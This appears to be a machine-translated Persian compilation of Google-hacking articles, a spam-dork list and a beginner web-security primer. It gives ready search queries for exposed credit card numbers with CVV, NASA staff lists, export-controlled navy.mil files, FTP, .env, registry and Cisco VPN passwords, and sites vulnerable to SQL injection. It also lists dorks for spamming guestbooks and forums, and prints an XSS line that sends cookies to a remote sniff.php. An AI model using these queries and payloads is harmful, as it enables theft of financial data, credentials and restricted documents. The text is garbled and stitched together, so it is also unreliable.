برای هر اپراتور یک نسخه سبکتر با نام کوتاهتر (بدون پیشوند all) وجود دارد. تفاوت این است که allinurl پیوندها را با همه کلمات پیدا می کند، در حالی که inurl فقط با اولین آنها پیوندها را پیدا می کند. کلمات دوم و بعدی از پرس و جو می توانند در هر نقطه از صفحات وب ظاهر شوند. عملگر inurl نیز از نظر معنی - سایت با مشابه دیگر متفاوت است. اولین مورد همچنین به شما امکان می دهد هر دنباله ای از کاراکترها را در پیوند به سند مورد نظر پیدا کنید (به عنوان مثال /cgi-bin/) که به طور گسترده برای یافتن مؤلفه هایی با آسیب پذیری های شناخته شده استفاده می شود.

بیایید آن را در عمل امتحان کنیم. فیلتر allintext را انتخاب می‌کنیم و درخواست فهرستی از شماره‌های کارت اعتباری و کدهای راستی‌آزمایی را برمی‌گردانیم که تنها پس از دو سال منقضی می‌شوند (یا زمانی که صاحبان آنها از تغذیه پشت سر هم همه خسته شوند).

Allintext: تاریخ انقضا شماره کارت /2017 cvv

وقتی در اخبار می خوانید که یک هکر جوان "به سرورهای" پنتاگون یا ناسا هک کرده و اطلاعات طبقه بندی شده را می دزدد، در بیشتر موارد دقیقاً این تکنیک ابتدایی استفاده از گوگل است. فرض کنید ما به لیستی از کارمندان ناسا و اطلاعات تماس آنها علاقه مند هستیم. مطمئناً چنین فهرستی به صورت الکترونیکی است. برای راحتی و یا به دلیل یک نادیده گرفتن، می تواند در وب سایت خود سازمان نیز قرار گیرد. منطقی است که در این مورد هیچ اشاره ای به آن وجود نخواهد داشت، زیرا برای استفاده داخلی در نظر گرفته شده است. چه کلماتی می تواند در چنین فایلی باشد؟ حداقل - فیلد "آدرس". آزمایش همه این فرضیات آسان است.

inurl:nasa.gov نوع فایل:xlsx "آدرس"

ما از بوروکراسی استفاده می کنیم

چنین یافته هایی یک چیز کوچک دلپذیر است. جذب واقعاً قوی از دانش دقیق تر از اپراتورهای وب مستر گوگل، خود وب و ساختار چیزی که به دنبال آن هستید ناشی می شود. با دانستن جزئیات، می‌توانید به راحتی خروجی را فیلتر کرده و ویژگی‌های فایل‌های مورد نیاز خود را برای به دست آوردن داده‌های واقعا ارزشمند در بقیه اصلاح کنید. خنده دار است که بوروکراسی اینجا به کمک می آید. فرمول‌بندی‌های معمولی را تولید می‌کند که جستجوی اطلاعات محرمانه‌ای را که به طور تصادفی در وب منتشر شده است راحت می‌کند.

به عنوان مثال، مهر بیانیه توزیع، که در دفتر وزارت دفاع ایالات متحده اجباری است، به معنای محدودیت های استاندارد در توزیع یک سند است. حرف A نشانه انتشار عمومی است که در آن هیچ چیز مخفی وجود ندارد. B - فقط برای استفاده داخلی در نظر گرفته شده است، C - کاملا محرمانه، و غیره تا F. به طور جداگانه، حرف X وجود دارد که اطلاعات ارزشمندی را نشان می دهد که نشان دهنده یک راز دولتی در بالاترین سطح است. اجازه دهید کسانی که قرار است این کار را در حین انجام وظیفه انجام دهند به دنبال چنین اسنادی بگردند و ما خود را به پرونده هایی با حرف C محدود می کنیم. طبق DoDI 5230.24، چنین علامت گذاری به اسنادی اختصاص داده می شود که حاوی شرح فناوری های حیاتی هستند که تحت کنترل صادرات هستند. شما می توانید چنین اطلاعاتی را که به دقت محافظت شده اند را در سایت هایی در دامنه سطح بالای .mil که به ارتش ایالات متحده اختصاص داده شده است بیابید.

"بیانیه توزیع C" inurl:navy.mil

بسیار راحت است که فقط سایت های وزارت دفاع ایالات متحده و سازمان های قراردادی آن در دامنه .mil جمع آوری شوند. نتایج جستجوی محدود به دامنه فوق العاده تمیز هستند و عناوین خود صحبت می کنند. جستجوی اسرار روسیه از این طریق عملاً بی فایده است: هرج و مرج در دامنه های .ru و .rf حاکم است و نام بسیاری از سیستم های تسلیحاتی مانند گیاه شناسی (PP "Kiparis"، اسلحه های خودکششی "Acacia") یا حتی به نظر می رسد. افسانه (TOS "پینوکیو").

با بررسی دقیق هر سندی از یک سایت در دامنه .mil، می توانید نشانگرهای دیگری را برای اصلاح جستجوی خود مشاهده کنید. به عنوان مثال، اشاره به محدودیت های صادرات "Sec 2751"، که برای جستجوی اطلاعات فنی جالب نیز راحت است. هر از چند گاهی از سایت های رسمی حذف می شود، جایی که زمانی ظاهر می شد، بنابراین اگر نمی توانید پیوند جالبی را در نتایج جستجو دنبال کنید، از کش گوگل (اپراتور کش) یا وب سایت آرشیو اینترنت استفاده کنید.

به ابرها صعود می کنیم

علاوه بر اسنادی که به‌طور تصادفی از طبقه‌بندی خارج شده‌اند از ادارات دولتی، پیوندهایی به فایل‌های شخصی از Dropbox و سایر سرویس‌های ذخیره‌سازی داده که پیوندهای «خصوصی» به داده‌های منتشر شده عمومی ایجاد می‌کنند، گهگاه در حافظه پنهان Google ظاهر می‌شوند. حتی با خدمات جایگزین و خودساخته بدتر است. به عنوان مثال، کوئری زیر داده‌های تمامی کلاینت‌های Verizon را پیدا می‌کند که سرور FTP را نصب کرده و به طور فعال از روتر روی روتر خود استفاده می‌کنند.

Allinurl:ftp://verizon.net

در حال حاضر بیش از چهل هزار نفر از این افراد باهوش وجود دارند و در بهار 2015 مرتبه بزرگی بیشتری وجود داشت. به جای Verizon.net، می‌توانید نام هر ارائه‌دهنده معروفی را جایگزین کنید، و هر چه معروف‌تر باشد، اندازه‌گیری بزرگ‌تر می‌شود. از طریق سرور FTP داخلی، می توانید فایل ها را روی درایو خارجی متصل به روتر مشاهده کنید. معمولاً این یک NAS برای کار از راه دور، یک ابر شخصی یا نوعی دانلود فایل همتا به همتا است. تمام محتوای چنین رسانه هایی توسط گوگل و سایر موتورهای جستجو ایندکس می شود، بنابراین می توانید از طریق یک لینک مستقیم به فایل های ذخیره شده در درایوهای خارجی دسترسی داشته باشید.

مشاهده تنظیمات

قبل از انتقال عمده به ابرها، سرورهای FTP ساده، که فاقد آسیب‌پذیری بودند، به عنوان ذخیره‌سازی راه دور حکمفرما بودند. بسیاری از آنها هنوز هم مربوط به امروز هستند. به عنوان مثال، برنامه محبوب WS_FTP Professional داده های پیکربندی، حساب های کاربری و رمزهای عبور را در فایل ws_ftp.ini ذخیره می کند. یافتن و خواندن آن آسان است زیرا همه ورودی ها در متن ساده ذخیره می شوند و رمزهای عبور با استفاده از الگوریتم Triple DES پس از حداقل مبهم سازی رمزگذاری می شوند. در اکثر نسخه ها، صرفاً دور انداختن بایت اول کافی است.

رمزگشایی چنین رمزهای عبور با استفاده از ابزار WS_FTP Password Decryptor یا یک سرویس وب رایگان آسان است.

وقتی صحبت از هک کردن یک سایت دلخواه می شود، معمولاً به معنای دریافت رمز عبور از لاگ ها و پشتیبان گیری از CMS یا فایل های پیکربندی برنامه تجارت الکترونیک است. اگر ساختار معمولی آنها را بدانید، می توانید به راحتی کلمات کلیدی را مشخص کنید. خطوطی مانند خطوط موجود در ws_ftp.ini بسیار رایج هستند. به عنوان مثال، دروپال و پرستاشاپ همیشه یک شناسه کاربری (UID) و یک رمز عبور مربوطه (pwd) دارند و تمام اطلاعات در فایل هایی با پسوند inc ذخیره می شوند. می توانید آنها را به این صورت جستجو کنید:

"pwd=" "UID=" ext:inc

ما رمزهای عبور را از DBMS فاش می کنیم

در فایل های پیکربندی سرورهای SQL، نام کاربری و آدرس ایمیل به صورت متن شفاف ذخیره می شود و به جای رمز عبور، هش MD5 آنها ثبت می شود. رمزگشایی آنها، به طور دقیق، غیرممکن است، اما شما می توانید در بین جفت های رمز عبور شناخته شده هش پیدا کنید.

تاکنون DBMS هایی وجود دارند که حتی از هش رمز عبور نیز استفاده نمی کنند. فایل های پیکربندی هر یک از آنها را می توان به سادگی در مرورگر مشاهده کرد.

Intext:DB_PASSWORD نوع فایل: env

با ظهور سرورهای ویندوز، جای فایل های پیکربندی تا حدی توسط رجیستری گرفته شد. شما می توانید در شاخه های آن دقیقاً به همین روش جستجو کنید و از reg به عنوان نوع فایل استفاده کنید. به عنوان مثال، مانند این:

نوع فایل:reg HKEY_CURRENT_USER "Password"=

بدیهیات را فراموش نکنید

گاهی اوقات می توان با کمک داده هایی که به طور تصادفی توسط گوگل باز شده و به دست می آید، به اطلاعات طبقه بندی شده دست یافت. گزینه ایده آل یافتن لیستی از رمزهای عبور در برخی از قالب های رایج است. فقط افراد ناامید می توانند اطلاعات حساب را در یک فایل متنی، یک سند Word یا یک صفحه گسترده اکسل ذخیره کنند، اما همیشه تعداد کافی از آنها وجود دارد.

نوع فایل:xls inurl:password

از یک سو ابزارهای زیادی برای جلوگیری از چنین حوادثی وجود دارد. باید حقوق دسترسی کافی در htaccess را مشخص کنید، CMS را وصله کنید، از اسکریپت های چپ استفاده نکنید و سوراخ های دیگر را ببندید. همچنین فایلی با فهرست حذف robots.txt وجود دارد که موتورهای جستجو را از فهرست کردن فایل ها و دایرکتوری های مشخص شده در آن منع می کند. از طرف دیگر، اگر ساختار robots.txt در برخی از سرورها با ساختار استاندارد متفاوت باشد، بلافاصله مشخص می شود که آنها سعی دارند چه چیزی را روی آن پنهان کنند.

فهرست دایرکتوری‌ها و فایل‌ها در هر سایتی با نمایه استاندارد نوشته قبل از آن قرار می‌گیرد. از آنجایی که برای اهداف خدماتی باید در عنوان ظاهر شود، منطقی است که جستجوی آن را به عملگر intitle محدود کنیم. چیزهای جالبی را می توان در دایرکتوری های /admin/، /personal/، /etc/ و حتی /secret/ پیدا کرد.

به روز رسانی ها را دنبال کنید

ارتباط در اینجا بسیار مهم است: آسیب پذیری های قدیمی بسیار آهسته بسته می شوند، اما گوگل و نتایج جستجوی آن دائما در حال تغییر هستند. حتی بین فیلتر «ثانیه آخر» (&tbs=qdr:s در انتهای url درخواست) و فیلتر «زمان واقعی» (&tbs=qdr:1) تفاوت وجود دارد.

فاصله زمانی آخرین تاریخ به‌روزرسانی فایل از Google نیز به طور ضمنی نشان داده شده است. از طریق رابط گرافیکی وب، می توانید یکی از دوره های معمول (ساعت، روز، هفته و غیره) را انتخاب کنید یا محدوده تاریخ را تعیین کنید، اما این روش برای اتوماسیون مناسب نیست.

از ظاهر نوار آدرس، تنها می توان در مورد راهی برای محدود کردن خروجی نتایج با استفاده از ساختار &tbs=qdr: حدس زد. حرف y بعد از آن حد یک سال را مشخص می کند (&tbs=qdr:y)، m نتایج ماه گذشته، w برای هفته، d برای روز گذشته، h برای ساعت آخر، n برای دقیقه، و برای یک ثانیه به من بدهید. جدیدترین نتایجی که به تازگی در اختیار Google قرار گرفته است با استفاده از فیلتر &tbs=qdr:1 پیدا شده است.

اگر نیاز به نوشتن یک اسکریپت پیچیده دارید، مفید خواهد بود که بدانید محدوده تاریخ در گوگل با فرمت Julian از طریق عملگر daterange تنظیم شده است. برای مثال، به این ترتیب می‌توانید فهرستی از اسناد PDF را با کلمه محرمانه که بین ۱ ژانویه تا ۱ ژوئیه ۲۰۱۵ آپلود شده‌اند، پیدا کنید.

نوع فایل محرمانه: pdf daterange: 2457024-2457205

محدوده در قالب تاریخ جولیان بدون اعشار مشخص شده است. ترجمه دستی آنها از تقویم میلادی ناخوشایند است. استفاده از مبدل تاریخ آسانتر است.

هدف گذاری و دوباره فیلتر کردن

علاوه بر مشخص کردن اپراتورهای اضافی در جست‌وجو، می‌توان آنها را مستقیماً در متن پیوند ارسال کرد. برای مثال، ویژگی filetype:pdf با ساختار as_filetype=pdf مطابقت دارد. بنابراین، تنظیم هر گونه توضیح راحت است. بیایید بگوییم که خروجی نتایج فقط از جمهوری هندوراس با افزودن ساختار cr=countryHN به URL جستجو تنظیم می شود، اما فقط از شهر Bobruisk - gcs=Bobruisk . برای لیست کاملی از بخش توسعه دهندگان را ببینید.

ابزارهای اتوماسیون گوگل برای آسان‌تر کردن زندگی طراحی شده‌اند، اما اغلب به دردسر می‌افزایند. به عنوان مثال، شهر یک کاربر توسط IP کاربر از طریق WHOIS تعیین می شود. بر اساس این اطلاعات، گوگل نه تنها بار بین سرورها را متعادل می کند، بلکه نتایج جستجو را نیز تغییر می دهد. بسته به منطقه، برای همان پرس و جو، نتایج متفاوتی به صفحه اول می رسد و ممکن است برخی از آنها کاملاً پنهان شوند. مانند یک جهان وطن احساس کنید و جستجوی اطلاعات از هر کشوری به کد دو حرفی آن بعد از دستورالعمل gl=country کمک می کند. به عنوان مثال، کد هلند NL است، در حالی که واتیکان و کره شمالی کد خود را در گوگل ندارند.

اغلب نتایج جستجو حتی پس از استفاده از چند فیلتر پیشرفته نیز پر از آب می شوند. در این مورد، به راحتی می توان پرس و جو را با افزودن چند کلمه استثنا به آن اصلاح کرد (هر کدام با علامت منهای قبل از هر کدام). به عنوان مثال، بانکداری، نام ها و آموزش اغلب با کلمه Personal استفاده می شود. بنابراین، نتایج جستجوی تمیزتر نه یک نمونه کتاب درسی از یک پرس و جو، بلکه یک نمونه تصفیه شده را نشان می دهد:

عنوان:"شاخص /شخصی/" -نام ها -آموزش -بانکداری

آخرین مثال

یک هکر پیشرفته با این واقعیت متمایز می شود که هر آنچه را که نیاز دارد به تنهایی برای خود فراهم می کند. به عنوان مثال، VPN یک چیز راحت است، اما گران است یا موقت و با محدودیت. ثبت نام برای خودتان به تنهایی بسیار گران است. خوب است که اشتراک های گروهی وجود دارد و با کمک گوگل می توان به راحتی عضو یک گروه شد. برای انجام این کار، فقط فایل پیکربندی Cisco VPN را پیدا کنید که دارای پسوند PCF نسبتاً غیر استاندارد و یک مسیر قابل تشخیص است: Program Files\Cisco Systems\VPN Client\Profiles. یک درخواست، و شما برای مثال به کارکنان دوستانه دانشگاه بن بپیوندید.

نوع فایل: pcf vpn OR Group

اطلاعات

رمزهای عبور به صورت رمزگذاری شده ذخیره می شوند، اما موریس ماسارد قبلاً برنامه ای برای رمزگشایی آنها نوشته است و آن را به صورت رایگان از طریق thecampusgeeks.com ارائه می دهد.

با کمک گوگل صدها نوع مختلف حمله و تست نفوذ انجام می شود. گزینه های زیادی وجود دارد که بر برنامه های محبوب، فرمت های اصلی پایگاه داده، آسیب پذیری های متعدد PHP، ابرها و غیره تأثیر می گذارد. دانستن اینکه دقیقاً به دنبال چه چیزی هستید، به دست آوردن اطلاعات مورد نیاز (مخصوصاً اطلاعاتی که قصد عمومی کردن آن را نداشتید) بسیار آسان تر می کند. نه تنها Shodan ایده های جالب را تغذیه می کند، بلکه هر پایگاه داده ای از منابع شبکه فهرست شده را ارائه می دهد!

نحوه جستجو با استفاده از google.com

احتمالاً همه می دانند که چگونه از موتور جستجویی مانند گوگل استفاده کنند =) اما همه نمی دانند که اگر یک عبارت جستجو را به درستی با استفاده از ساختارهای خاص بنویسید، می توانید نتایج مورد نظر خود را بسیار کارآمدتر و سریعتر به دست آورید =) در این مقاله من سعی خواهم کرد نشان دهم که چگونه باید برای جستجوی صحیح انجام دهید

Google از چندین اپراتور جستجوی پیشرفته پشتیبانی می کند که هنگام جستجو در google.com معنای خاصی دارند. به طور معمول، این اپراتورها جستجو را تغییر می دهند، یا حتی به گوگل می گویند که انواع مختلف جستجو را انجام دهد. به عنوان مثال، طراحی ارتباط دادن:یک اپراتور ویژه است و پرس و جو لینک: www.google.comبه شما یک جستجوی معمولی نمی دهد، اما در عوض تمام صفحات وب را که پیوندهایی به google.com دارند پیدا می کند.
انواع درخواست جایگزین

حافظه پنهان:اگر کلمات دیگری را در پرس و جو وارد کنید، Google کلمات موجود در سند ذخیره شده را برجسته می کند.
مثلا، کش: www.webمحتوای ذخیره شده را با کلمه "وب" برجسته نشان می دهد.

ارتباط دادن:عبارت جستجوی بالا صفحات وبی را نشان می دهد که حاوی پیوندهایی به پرس و جوی مشخص شده هستند.
مثلا: لینک:www.websiteتمام صفحاتی که دارای پیوند به http://www.site هستند نمایش داده می شود

مربوط:صفحات وب را نشان می دهد که "مربوط" به صفحه وب مشخص شده هستند.
مثلا، مرتبط: www.google.comصفحات وب مشابه صفحه اصلی گوگل را فهرست می کند.

اطلاعات:اطلاعات درخواستی: اطلاعاتی را که گوگل در مورد صفحه وب درخواستی دارد ارائه می دهد.
مثلا، اطلاعات: وب سایتاطلاعاتی در مورد انجمن ما نشان می دهد =) (Armada - انجمن وب مسترهای بزرگسال).

سایر درخواست های اطلاعاتی

تعريف كردن:پرس و جو define: تعریفی از کلماتی که بعد از این تایپ می کنید را ارائه می دهد که از منابع مختلف آنلاین جمع آوری شده است. این تعریف برای کل عبارت وارد شده خواهد بود (یعنی شامل تمام کلمات در عبارت جستجوی دقیق می شود).

سهام:اگر یک پرس و جو را با سهام شروع کنید: Google بقیه عبارات پرس و جو را به عنوان نشانه های سهام تلقی می کند و به صفحه ای پیوند می دهد که اطلاعات آماده شده برای آن شخصیت ها را نشان می دهد.
مثلا، سهام: اینتل یاهواطلاعاتی در مورد اینتل و یاهو نشان خواهد داد. (توجه داشته باشید که باید کاراکترهای اخبار فوری را چاپ کنید، نه نام شرکت)

درخواست اصلاح کننده ها

سایت:اگر سایت: را در جستجوی خود قرار دهید، گوگل نتایج را به وب سایت هایی که در آن دامنه پیدا می کند محدود می کند.
همچنین می توانید مناطق جداگانه مانند ru، org، com و غیره را جستجو کنید ( سایت: کام سایت:ru)

allintitle:اگر یک پرس و جو با allintitle: اجرا کنید، گوگل نتایج را با تمام کلمات جستجو در عنوان محدود می کند.
مثلا، allintitle: جستجو در گوگلتمام صفحات جستجوی گوگل مانند تصاویر، وبلاگ و غیره را برمی گرداند

عنوان:اگر intitle: را در جستار خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در عنوان هستند محدود می کند.
مثلا، عنوان: کسب و کار

آلینورل:اگر درخواستی را با allinurl اجرا کنید: Google نتایج را با تمام کلمات جستجو در URL محدود می کند.
مثلا، allinurl: جستجو در گوگلاسناد را با گوگل برمی گرداند و در عنوان جستجو می کند. همچنین، به عنوان یک گزینه، می توانید کلمات را با علامت (/) جدا کنید، سپس کلمات دو طرف اسلش در همان صفحه جستجو می شوند: مثال allinurl: foo/bar

inurl:اگر inurl: را در جستجوی خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در URL هستند محدود می کند.
مثلا، انیمیشن inurl:website

در متن:فقط در متن صفحه برای کلمه مشخص شده جستجو می کند، بدون توجه به عنوان و متون پیوندها، و موارد غیر مرتبط با آن. همچنین یک مشتق از این اصلاح کننده وجود دارد - allintext:آن ها علاوه بر این، تمام کلمات در پرس و جو فقط در متن جستجو می شوند، که این نیز مهم است، و کلمات پرکاربرد در پیوندها را نادیده می گیرند.
مثلا، intext: انجمن

محدوده زمانی:جستجو در بازه های زمانی (daterange: 2452389-2452389)، تاریخ ها برای زمان در قالب جولیان مشخص شده است.

خوب، و انواع نمونه های جالب از درخواست ها

نمونه هایی از کامپایل پرس و جو برای گوگل. برای اسپمرها

inurl:control.guest?a=sign

Site:books.dreambook.com "URL صفحه اصلی" "Sign my" inurl:sign

سایت: www.freegb.net صفحه اصلی

Inurl:sign.asp "تعداد کاراکترها"

"پیام:" inurl:sign.cfm "فرستنده:"

inurl:register.php "ثبت کاربر" "وب سایت"

Inurl:edu/کتاب مهمان «کتاب مهمان را امضا کنید»

Inurl: ارسال "پست نظر" "URL"

Inurl:/archives/ "Comments:" "اطلاعات را به خاطر دارید؟"

"اسکریپت و کتاب مهمان ایجاد شده توسط:" "URL:" "نظرات:"

inurl:?action=add "phpBook" "URL"

عنوان: "ارسال داستان جدید"

مجلات

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl؟

inurl:fastbb.ru /re.pl؟ "کتاب مهمان"

وبلاگ ها

Inurl:blogger.com/comment.g?”postID””ناشناس”

Inurl:typepad.com/ "یک نظر ارسال کنید" "اطلاعات شخصی را به خاطر دارید؟"

Inurl:greatestjournal.com/community/ "ارسال نظر" "آدرس پوسترهای ناشناس"

"پست نظر" "آدرس پوسترهای ناشناس" -

عنوان: ارسال نظر

Inurl:pirillo.com "ارسال نظر"

انجمن ها

Inurl:gate.html?”name=Forums” “mode=reply”

inurl:”forum/posting.php?mode=reply”

inurl:”mes.php?”

inurl:”members.html”

inurl:forum/memberlist.php؟"

تصمیم گرفتم کمی در مورد امنیت اطلاعات صحبت کنم. این مقاله برای برنامه نویسان تازه کار و کسانی که به تازگی توسعه Frontend را شروع کرده اند مفید خواهد بود. مشکل چیه؟

بسیاری از توسعه دهندگان تازه کار آنقدر به نوشتن کد معتاد هستند که امنیت کار خود را کاملا فراموش می کنند. و مهمتر از همه، آنها آسیب پذیری هایی مانند SQL query، XXS را فراموش می کنند. آنها همچنین رمزهای عبور آسانی را برای پنل های اداری خود ارائه می دهند و در معرض زور وحشیانه قرار می گیرند. این حملات چیست و چگونه می توان از آنها جلوگیری کرد؟

تزریق SQL

تزریق SQL رایج ترین نوع حمله به پایگاه داده است که با پرس و جوی SQL برای یک DBMS خاص انجام می شود. بسیاری از مردم و حتی شرکت های بزرگ از چنین حملاتی رنج می برند. دلیل آن اشتباه توسعه دهنده هنگام نوشتن پایگاه داده و در واقع پرس و جوهای SQL است.

یک حمله از نوع تزریق SQL به دلیل پردازش نادرست داده های ورودی مورد استفاده در پرس و جوهای SQL امکان پذیر است. با حمله موفقیت آمیز یک هکر، نه تنها محتویات پایگاه های داده، بلکه به ترتیب رمز عبور و گزارش های پنل مدیریتی را نیز از دست خواهید داد. و این داده ها برای تصاحب کامل سایت یا انجام تنظیمات برگشت ناپذیر در آن کاملاً کافی خواهد بود.

این حمله را می توان با موفقیت در اسکریپت های نوشته شده در PHP، ASP، Perl و زبان های دیگر بازتولید کرد. موفقیت چنین حملاتی بیشتر به این بستگی دارد که از کدام DBMS استفاده می شود و خود سناریو چگونه پیاده سازی می شود. سایت های آسیب پذیر زیادی برای تزریق SQL در دنیا وجود دارد. این به راحتی قابل تأیید است. کافی است وارد "dorks" شوید - اینها درخواست های ویژه ای برای یافتن سایت های آسیب پذیر هستند. در اینجا به برخی از آنها اشاره می کنیم:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

چگونه از آنها استفاده کنیم؟ کافی است آنها را در موتور جستجوی Google یا Yandex وارد کنید. موتور جستجو نه تنها یک سایت آسیب پذیر، بلکه صفحه ای برای این آسیب پذیری در اختیار شما قرار می دهد. اما ما به همین جا بسنده نمی کنیم و مطمئن می شویم که صفحه واقعاً آسیب پذیر است. برای این کار کافی است یک نقل قول “‘” بعد از مقدار “id=1” قرار دهید. چیزی شبیه به این:

• inurl:games.php?id=1'

و سایت یک خطا در مورد پرس و جو SQL به ما می دهد. هکر ما در مرحله بعد به چه چیزی نیاز دارد؟

و سپس او به همین پیوند به صفحه با خطا نیاز دارد. سپس کار بر روی آسیب پذیری در اکثر موارد در توزیع "Kali linux" با ابزارهای آن برای این بخش انجام می شود: معرفی کد تزریق و انجام عملیات لازم. چگونه این اتفاق خواهد افتاد، نمی توانم به شما بگویم. اما می توانید اطلاعاتی در این مورد در اینترنت پیدا کنید.

حمله XSS

این نوع حمله روی کوکی ها انجام می شود. آنها به نوبه خود علاقه زیادی به نجات کاربران دارند. چرا که نه؟ بدون آنها چطور؟ از این گذشته ، به لطف کوکی ها ، ما صد بار رمز عبور را از Vk.com یا Mail.ru وارد نمی کنیم. و تعداد کمی هستند که آنها را رد کنند. اما در اینترنت، اغلب برای هکرها یک قانون ظاهر می شود: ضریب راحتی مستقیماً با ضریب ناامنی متناسب است.

برای اجرای یک حمله XSS، هکر ما به دانش جاوا اسکریپت نیاز دارد. این زبان در نگاه اول بسیار ساده و بی ضرر است، زیرا به منابع کامپیوتری دسترسی ندارد. یک هکر فقط در مرورگر می تواند با جاوا اسکریپت کار کند، اما همین کافی است. پس از همه، نکته اصلی این است که کد را وارد صفحه وب کنید.

من به جزئیات در مورد روند حمله نمی پردازم. من فقط اصول اولیه و معنای چگونگی این اتفاق را خواهم گفت.

یک هکر می تواند کد JS را به برخی از انجمن ها یا کتاب مهمان اضافه کند:

اسکریپت‌ها ما را به صفحه‌ای آلوده هدایت می‌کنند که در آن کد اجرا می‌شود: خواه یک sniffer، نوعی ذخیره‌سازی یا یک سوء استفاده که به نوعی کوکی‌های ما را از حافظه پنهان می‌دزدد.

چرا جاوا اسکریپت؟ زیرا جاوا اسکریپت با درخواست های وب عالی است و به کوکی ها دسترسی دارد. اما اگر اسکریپت ما را به سایتی منتقل کند، کاربر به راحتی متوجه این موضوع می شود. در اینجا، هکر از گزینه حیله گرتری استفاده می کند - او به سادگی کد را در تصویر وارد می کند.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

ما به سادگی یک تصویر ایجاد می کنیم و اسکریپت خود را به عنوان یک آدرس به آن اختصاص می دهیم.

چگونه از خود در برابر این همه محافظت کنید؟ بسیار ساده - پیوندهای مشکوک را دنبال نکنید.

حملات DoS و DDos

DoS (از انگلیسی Denial of Service - انکار سرویس یک حمله هکری به یک سیستم کامپیوتری با هدف شکست آن است. این ایجاد شرایطی است که در آن کاربران وظیفه شناس سیستم نتوانند به منابع (سرور) سیستم ارائه شده دسترسی داشته باشند و یا این دسترسی مشکل باشد. اگر در شرایط اضطراری، نرم افزار اطلاعات مهمی را ارائه دهد، مانند نسخه، بخشی از کد برنامه، و غیره، خرابی سیستم می تواند گامی در جهت گرفتن آن باشد. اما اغلب این یک معیار است فشار اقتصادی: از دست دادن یک سرویس ساده که درآمد ایجاد می کند. صورت‌حساب‌های ارائه‌دهنده یا اقداماتی برای جلوگیری از حمله به طور قابل‌توجهی به "هدف" در جیب ضربه می‌زند. در حال حاضر، حملات DoS و DDoS محبوب‌ترین هستند، زیرا به شما این امکان را می‌دهند که تقریباً هر سیستمی را بدون به جا گذاشتن شواهد مهم قانونی به شکست بکشانید.

تفاوت بین حملات DoS و DDos چیست؟

DoS یک حمله است که به روشی هوشمند ساخته شده است. به عنوان مثال، اگر سرور صحت بسته های دریافتی را بررسی نکند، یک هکر می تواند چنین درخواستی را ارائه دهد که برای همیشه پردازش می شود و زمان پردازشگر کافی برای کار با سایر اتصالات وجود نخواهد داشت. بر این اساس، مشتریان انکار خدمات دریافت خواهند کرد. اما بارگذاری بیش از حد یا غیرفعال کردن سایت های شناخته شده بزرگ به این روش کارساز نخواهد بود. آنها مجهز به کانال های نسبتاً گسترده و سرورهای فوق العاده قدرتمند هستند که به راحتی می توانند با چنین بار اضافی کنار بیایند.

DDoS در واقع همان حمله DoS است. اما اگر در DoS یک بسته درخواست وجود داشته باشد، در DDoS ممکن است صدها یا بیشتر از آنها وجود داشته باشد. حتی سرورهای سنگین ممکن است نتوانند با چنین بار اضافی کنار بیایند. من برای شما یک مثال می زنم.

حمله DoS زمانی است که شما در حال مکالمه با شخصی هستید، اما یک فرد بد اخلاق می آید و با صدای بلند شروع به فریاد زدن می کند. صحبت کردن یا غیرممکن است یا بسیار دشوار. راه حل: با امنیت تماس بگیرید که باعث آرامش و خروج فرد از اتاق می شود. حملات DDoS زمانی اتفاق می‌افتد که هزاران نفر از این افراد بد اخلاق وارد آن شوند. در این صورت نگهبانان نمی توانند همه را بپیچانند و با خود ببرند.

DoS و DDoS از رایانه‌هایی تولید می‌شوند که به اصطلاح زامبی‌ها هستند. اینها رایانه‌های کاربرانی هستند که توسط هکرها هک شده‌اند و حتی گمان نمی‌کنند که دستگاهشان در حمله به هیچ سروری نقش داشته باشد.

چگونه از خود در برابر این محافظت کنید؟ به طور کلی، به هیچ وجه. اما شما می توانید کار یک هکر را پیچیده کنید. برای این کار باید یک هاست خوب با سرورهای قدرتمند انتخاب کنید.

حمله بی رحمانه

یک توسعه‌دهنده می‌تواند سیستم‌های حفاظت از حمله زیادی را ارائه کند، اسکریپت‌هایی که نوشته‌ایم را به طور کامل بررسی کند، سایت را برای آسیب‌پذیری‌ها بررسی کند و غیره. اما وقتی نوبت به آخرین مرحله طرح‌بندی سایت می‌رسد، یعنی زمانی که فقط یک رمز عبور در پنل مدیریت قرار می‌دهد، او می‌تواند یک چیز را فراموش کند. کلمه عبور!

اکیداً توصیه نمی شود که یک رمز عبور ساده تنظیم کنید. می تواند 12345، 1114457، vasya111 و غیره باشد. توصیه نمی شود رمزهای عبور کمتر از 10-11 کاراکتر تنظیم کنید. در غیر این صورت، ممکن است در معرض رایج ترین و نه پیچیده ترین حمله - Brute Force قرار بگیرید.

Brute Force یک حمله brute-force مبتنی بر کلمه عبور با استفاده از برنامه های خاص است. لغت نامه ها می توانند متفاوت باشند: لاتین، مرتب سازی بر اساس اعداد، فرض کنید تا محدوده ای، ترکیبی (لاتین + اعداد)، و حتی فرهنگ لغت هایی با نمادهای منحصر به فرد @#4$%&*~~`'”\ ? و غیره.

البته اجتناب از این نوع حمله به راحتی امکان پذیر است کافی است یک رمز عبور پیچیده ارائه دهید. حتی کپچا هم می تواند شما را نجات دهد. و همچنین، اگر سایت شما بر روی CMS ساخته شده است، بسیاری از آنها نوع مشابهی از حمله را محاسبه کرده و ip را مسدود می کنند. همیشه باید به یاد داشته باشیم که هر چه کاراکترهای مختلف رمز عبور بیشتر باشد، انتخاب آن سخت‌تر می‌شود.

